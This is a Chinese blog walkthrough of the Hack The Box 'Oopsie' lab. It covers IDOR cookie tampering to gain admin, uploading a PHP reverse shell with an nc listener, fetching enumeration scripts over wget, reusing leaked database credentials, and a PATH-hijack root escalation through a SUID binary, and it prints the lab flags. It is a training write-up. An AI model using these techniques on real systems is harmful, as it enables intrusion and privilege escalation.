Hack The Box Starting Point 渗透测试入门靶场 TIER 2 - Oopsie

已于 2022-05-19 13:22:33 修改
阅读量566 收藏 1
点赞数 1
文章标签: web安全 安全 网络 网络安全
于 2022-05-18 15:34:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42445757/article/details/124843729
版权

image.png
每当执行包含身份验证机制的 Web 评估时,始终建议检查 cookie、会话并尝试弄清楚访问控制的真正工作原理。 在许多情况下,远程代码执行攻击和系统立足点本身可能无法实现,而是在链接不同类型的漏洞和漏洞之后实现。 在此框中,我们将了解信息泄露和访问控制损坏类型的漏洞,即使它们看起来不是很重要,也会在攻击系统时产生很大的影响,因此即使是很小的漏洞也很重要。

先扫描一下:namp -sV -sC 10.129.133.42
开放了3个TCP端口,22 ssh,80 http,还有一个10626。
image.png

既然有80端口,那们我们先直接进入网页,
image.png
扫描一下目录:gobuster dir -u http://ip/ -w /usr/share/wordlists/dirb/common.txt
扫到了css, font, images, …, uploads等目录。
image.png
看一下页面源码,翻一翻
image.png
image.png
看看其所在目录,这里有个/cdn-cgi/login,疑似登陆页面,试一下。
image.png
在burp suite里的Site map也能找到该目录
image.png
看到后台随手试一下SQL注入admin’ ,没有回显。
试试admin’# +随意密码,没有成功。
放到Burp里Intruder爆破着
image.png

等待爆破结果,我们先点击Login as Guest,以游客身份进入看看。
这里进入的是/cdn-cgi/login/admin.php页面(php网站)
image.png
进入Account、Branding、Clients、Uploads页面一一查看。
id=2,AccessID是2233,用户名是guest。
image.png
image.png
image.png
uploads页面我们没有超级管理员权限,无法进入。
image.png
看完这些页面后,发现Acoount、Branding、Clients页面看似没有啥用,仅仅提供了几条简单的信息,但是仔细发现,这里我们的ID都是2,这是不是意味着有人的ID为1,有没有可能是超管呢?我们怎么拿到超管的权限进入uploads页面呢?进入uploads页面是不是可以上传我们的文件比如木马?
我们尝试将Account页面的id改为1,发现查询的用户名变成了admin!这里就发生了越权。
image.png
这里我们抓一下包,发现这里的Cookie是游客身份,显示的Access ID为2233,name为guset的cookie。
image.png
我们修改一下cookie,改成我们刚才查询到的admin信息。并尝试访问uploads页面。
image.png
注:也可以F12,在“存储/Storage”中直接修改cookie的值(使用的是火狐浏览器)
image.png
可以看到这里我们就成功利用超管权限进入到了uploads页面。
image.png
在kali的/usr/share/webshells/php/目录下,有一个反弹shell的木马:php-reverse-shell.php可以回连到我们本机,配置一下该php文件,将ip改成我们本机,指定一个port。
image.png
上传该文件
image.png
上传后发现,我们并不知道文件被上传到哪里,那么自然也无法连接。
但是,我们gobuster扫描出一个目录名为upload,猜测上传的文件可能被存到该目录下。
首先使用nc在本机开启监听:nc -lvvp 1234
浏览器输入URL:http://ip/uploads/php-reverse-shell.php并前往,这里成功反弹回一个shell,只是我们的权限较低,www-data
image.png
上面的shell有些简陋,我们通过python建立一个更具功能性的shell。
python3 -c 'import pty;pty.spawn("/bin/bash")'
image.png
因此我们现在的权限较低,所以我们的想法肯定是提权,那么我们先上传Linux提权需要的信息收集工具,如LinEnum.sh、Linux-exploit-suggester.sh等。
首先在我们本机用python开启一个HTTP SERVER,让目标机能够下载我们的文件。
sudo python3 -m http.server 80
第一种:使用Linux-exploit-suggester.sh
在目标机用wget命令下载信息收集工具,直接下载是不行的,我们在该目录下没有权限
image.png
ls -al看一看哪些目录有权限,tmp,提权常用目录。
image.png
cd tmp,进入该目录,使用wget命令下载Linux-exploit-suggester.sh,下载后直接运行
发现没有权限运行,那么我们通过chmod赋予该文件权限,成功运行,进行提权的信息收集。
image.png
会提示我们一些可能的EXP
image.png
看到第一个sudo Baron Samedit,是一个Linux sudo提权
我们输入sudoedit -s /测试一下是否存在漏洞,这里的回显是usage开头,说明不存在该漏洞;如果回显是以sudoedit开头的报错,那么表明存在该漏洞。
image.png
第二种:使用LinEnum.sh
直接运行即可,我们在SUID files里发现了bugtracker文件,可以想一下怎么利用SUID提权,怎么利用我们在下面会讲到。
image.png
image.png

我们回到本次靶机中来,根据本机的walkthrough,我们可以在/var/www/html/cdn-cgi/login目录下可以发现几个名字看起来就比较重要的php文件-index.php、admin.php、db.php,逐个分析
image.png
在index.php文件中,对POST请求做了username和password的判断,admin/MEGACORP_4dm1n!!
(可以使用cat * | grep -i passw*搜索密码,-i:忽视大小写))
image.png
admin.php是根据参数返回页面内容
db.php是连接数据库的账号密码robert/M3g4C0rpUs3r!
image.png
在/etc/passwd里我们可以找到robert这个用户,我们尝试登陆该用户。
image.png
成功登入
image.png
id,我们看到robert的group有robert和bugtracker。
image.png
然后我们cd /home/rebert可以拿到robert的flag:f2c74ee8db7983851ab2a96a44eb7981。
image.png
因为robert是bugtracker组的一员,我们查找一下该组内的所有文件。
find / -group bugtracker 2>/dev/null
image.png
找到了/usr/bin/bugtrakcer文件,我们检查他的类型和权限。
file /usr/bin/bugtracker
ls -al /usr/bin/bugtracker- s:指SUID权限,所有者为root,这是一个SUID文件。
image.png
注:通常称为 SUID(设置所有者用户 ID),用户访问级别的特殊权限具有单一功能:具有 SUID 的文件始终以拥有该文件的用户身份执行,而不管用户传递命令。如果文件所有者没有执行权限,则在此处使用大写的 S。“bugtracker”归 root 所有,我们可以作为 root 执行它,因为它设置了 SUID。
我们运行bugtracker文件,该文件执行的是cat操作,查看/root/reports/目录下的文件。
image.png
我们发现该工具接受用户输入作为将使用cat命令读取的文件的名称,但是,它没有指定文件 cat 的整个路径,因此我们可以利用它。
接下来我们要做的就是伪造一个cat
首先,在tmp目录下创建cat文件:cd /tmp,touch cat
将/bin/bash写入cat文件中:echo "/bin/bash" > cat
赋予cat文件可执行权限:chmod +x cat
image.png
我们将/tmp目录添加到PATH环境变量中的前面(PATH 是类 Unix 操作系统、DOS、OS/2 和 Microsoft Windows 上的环境变量,它指定一组可执行程序所在的目录。)
export PATH=/tmp:$PATH
echo $PATH,打印环境变量看一下
image.png
然后我们执行bugtracker,就会发现我们已经进入到root的shell,成功提升到root权限。
image.png
我们cd /root,进入root目录打印root.txt得到flag:af13b0bee69f8a877c3faf667f7beacf
注:这里我们要首先删除/tmp目录下的cat文件->rm /tmp/root.txt,因为我们直接调用cat其实是在PATH路径中依次寻找cat,最先调用的将会是/tmp/cat(即/bin/bash),而无法查看文件内容。
image.png

补充一下:
1、也可以上传一句话木马shell.php,蚁剑尝试连接,进行后续操作。image.png
image.png
2、也可以尝试能不能用sqlmap的cookie注入试试(默认情况下sqlmap支持GET/POST注入,当–level=2时,支持cookie注入;当–level=3时,支持User-Agent和Referer)
sqlmap -u http://10.129.190.77/ --cookie=“user=34322; role=admin” --level 2 --batch
扫描显示没有SQL注入。
3、我们通过burp suite的Intruder模块并没有爆破出密码(字典不行)

这台靶机打完,我们做一下TASKS:
TASK 1,使用什么种类的工具来拦截web流量?proxy类的,如 burp suite
image.png
TASK 2,哪个路径返回的是登陆页面?/cdn-cgi/login
image.png
TASK 3,在火狐里修改什么可以进入upload页面?cookie,改成admin的身份信息。
image.png
TASK 4,admin用户的ACCESS ID是什么?34322
image.png
TASK 5,文件上传到哪个目录下??uploads目录
image.png
TASK 6,包含于robert用户共享的密码的文件是?db.php包含了robert的用户名和密码
image.png
TASK 7,使用-group bugtracker运行什么可执行文件来识别bugtracker组所拥有的文件?使用find命令,find / -group bugtracker 2>/dev/null
image.png
TASK 8,无论哪个用户开始运行bugtracker可执行文件,运行时使用的用户权限是什么?bugtracker文件的所有者是root,因为是SUID文件,其他用户运行该文件都会以root身份运行。
image.png
TASK 9,SUID是?Set owner User ID
image.png
TASK 10,以不安全方式调用的可执行文件的名字是什么?cat,因为bugtracker文件调用的是cat,没有以绝对路径调用。
image.png
最后提交user flag和root flag。

D4vid
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
3-2-Tier客户端安装.pdf
03-04
详细描述了TC 2-Tier客户端的安装过程
Hack the box -- 靶机渗透测试TIER2)
wjishuxiaobai的博客
06-25 1632
本文针对Hack the box 靶机TIER2渗透过程进行记录。开启在线靶机,靶机IP为10.129.88.20。端口扫描 扫描命令 sudo nmap -sC -sV 10.129.88.20, 发现1443端口开启了smb服务,所以尝试使用smbclient连接。smbclient连接 命令为:smbclient -N -L 10.129.88.20(-N表示无密码登录,-L可以查看服务器上可用服务) 通过查找发现在backups目录下存在一个配置文件prod.dtsConfig,将其下载本地进
hack the box靶场oopsie靶机
zr1213159840的博客
03-21 1542
打开靶机,看一下第一个问题: 问:什么可以拦截本地的流量? 答案:看着y结尾,应该是proxy,输入正确 第二问: 问:登录界面在什么文件夹下面? 答案:/cdn-cgi/login。知道这个页面的最直接的方式是f12后看下页面,能看到有一个cdn-cgi/login相关的信息。同时,根据提示,可以使用burpsuite爬取,这也是更加合适的方式,因为爬取能提供我们下一步信息。 在burpsuite中爬取这个网站,操作就是拦截数据包后在target中右击网站选择spider this host即可。然
Hack The Box,一款有意思的渗透测试平台
阿道夫的博客
02-03 1463
Hack TheBox是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中一些模拟真实场景,其中一些更倾向于CTF风格的挑战。Hack The Box还提供了Rank机制来作为我们挑战的动力,通过通关靶场来去获取积分提高自己的排名。1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)
Hack The Box - TIER 2 - Archetype Oopsie Vaccine Unified
Tajang的大千世界
03-08 2074
不想丸辣
linux提权辅助工具Linux_Exploit_Suggester(三种工具)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-11 2001
今天讲linux提权辅助工具三种之一Linux_Exploit_Suggester。Linux_Exploit_Suggester工具介绍,Linux_Exploit_Suggester是一款根据Linux操作系统版本号自动查找相应提权脚本的工具,旨在帮助检测给定 Linux 内核/基于 Linux 的机器的安全缺陷。 项目地址:https://github.com/mzet-/linux-exploit-suggester 对于工具检测出的每个漏洞,都会计算其存在的可能性: Highly prob
soloproject-tier2-mapbox-api:Chingu Solo Project-Tier 2-Mapbox API
05-25
Chingu Solo Project-Tier 2-Mapbox API 概述 该项目可帮助您获得使用API​​的经验,以增强您的应用程序为用户提供的价值。 该项目的目标是使用Mapbox API构建Web应用程序,以构建您选择的城市的地图。 关于成谷 ...
Data Center Site Infrastructure Tier Standard- Topology中文.pdf
04-14
该文档为Data Center Site Infrastructure Tier Standard- Topology的中文翻译,能够为数据中心设计者提供辅助和参考,适用于数据中心的建设者、设计者、运营者
magento-2-tier-price
03-21
MAGENTO 2的定价 当客户更改数量字段时,在产品页面上显示分级价格。 发展 正在开发中的扩展-适用于简单产品,不适用于可配置产品。 带有MAGENTO 2.3.6-2.4.1的睾丸 必须与MAGENTO版本2.3.3-2.3.5一起使用。 对于...
soloproject-tier1-website-template:Chingu Solo Project-Tier 1-网站模板
05-25
Chingu Solo Project-Tier 1-网站模板 概述 该项目通过克隆HTML / CSS / JS中的“征服”网站模板而没有Bootstrap,jQuery或其他库(例如Materialize),为您提供了制作Modern Looking Web应用程序的绝妙实践! 当您...
Hack The Box Starting Point 渗透测试入门靶场 TIER 2 - Archetype
Start C的博客
05-18 880
先对SPAWN的机器扫描一下,nmap -sC -sV IP 扫描出了135,139,445,1433端口及具体信息。 TASK 1,数据库服务在哪个TCP端口?根据nmap的扫描结果,Microsoft SQL Server 2017服务运行在1433端口。 TASK 2,SMB上可用的非管理共享的名称是什么? 我们使用smbclient查看一下目标主机上可用的共享 smbclient -N -L IP (-N:不需要密码,-L:获取主机上可用的共享列表) 这里我们发现除了ADMIN$、C$和I.
渗透测试练习靶场hackthebox——Starting Point Pathfinder攻略(详细版本)
weixin_42109829的博客
09-08 4717
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
靶机Lampiao之脏牛提权
m0_52754338的博客
10-02 1549
同样,将下载好的脏牛EXP,上传至目标靶机中,然后msf进入shell,然后编译成可执行文件,利用python开一个模拟终端,开启终端相当于ssh连接(通俗理解),有一个交互式连接。发现是Drupal的网站,查找相关的漏洞,存在远程代码执行的漏洞,msf中带有payload直接利用,设置攻击ip和端口,运行即可。可以看出,真正拿下Linux,权限还是不够,对Linux进行信息收集,查看可以用的漏洞,并提升权限至root。扫描靶机的端口,查看开放了哪些端口,发现1898端口开放,尝试访问。
页面信息泄露和cookie信息可操纵
最新发布
山兔的博客
02-13 289
每当我们执行包含身份验证机制的网络评估时,始终建议我们检查cookie、会话并尝试弄清楚访问控制的真正工作原理。在许多情况下,远程代码执行攻击系统上的立足点可能无法单独实现,而是在链接不同类型的漏洞和漏洞利用之后实现的。在此框中,我们将了解信息泄露和破坏访问控制类型的漏洞,即使它们看起来不是很重要,也可以在攻击系统时产生很大影响,因此即使是小漏洞也很重要。
hack the box oopsie 靶场练习
鸥鹭忘机
07-30 1126
扫描收集信息 今天来练习hack the box中的oopsie靶场,如何连接这里不做过多赘述。 连接过程可以参考上一篇博客进行了解:https://blog.csdn.net/rpsate/article/details/119190220 首先扫描一下端口与服务信息 nmap -sV -F 10.10.10.28 -sV 代表扫描端口和开放的服务信息 -F 快速扫描,扫描常用的端口 好我们看到了开放了80端口,应该是一台WEB服务器,我们通过浏览器访问一下这个IP试一下。 果然出现了网页,
Bug tracker
饭叔
12-18 705
12.18 bug track http://www.zentao.net/ http://www.easybug.net/ Redmine mantis 推荐11个免费开源的bug追踪软件  http://yp.oss.org.cn/blog/show_resource.php?resource_id=901 共有66款 BUG跟踪管理开源软件 http://www.oschin
HackTheBox-Bashed渗透测试
weixin_43111940的博客
04-13 293
端口信息,只开了80端口 目录扫描 gobuster dir -u http://10.10.10.68 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x 'html,php,asp,aspx,zip,rar' /dev/目录下有php的shell文件 通过执行命令可以判断是Linux系统,因为对命令的大小写敏感 既然可以执行命令,尝试一下用反弹shell命令,尝试了php,Linux的反弹命令,但是没有拿到she
hack the box-challenges:Export题解
zr1213159840的博客
04-30 582
打开题目,能看到关于题目的一段描述,大概内容为:我们发现了与我们其中一台服务器的可疑连接,并立即进行了内存转储。你能弄清楚攻击者在做什么吗? 下载提供的files,文件为raw格式。应该是内存相关的信息镜像存储下来了。 通过搜索,可以用Volatility在kali中读取。安装可以按照这个下面这个教程。教程中提供了好几个方法安装,我测试了第一个方法可行,那个直接放在/usr/sbin目录下面,我测试了后不行。 https://www.cn不logs.com/yunqian2017/p/14769955.
Hack the box (HTB) Metatwo靶机
qq_58869808的博客
11-05 5067
hackthebox metatwo靶机
VMware NSX-T部署配置手册.doc
06-17
VMware NSX-T部署配置手册

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值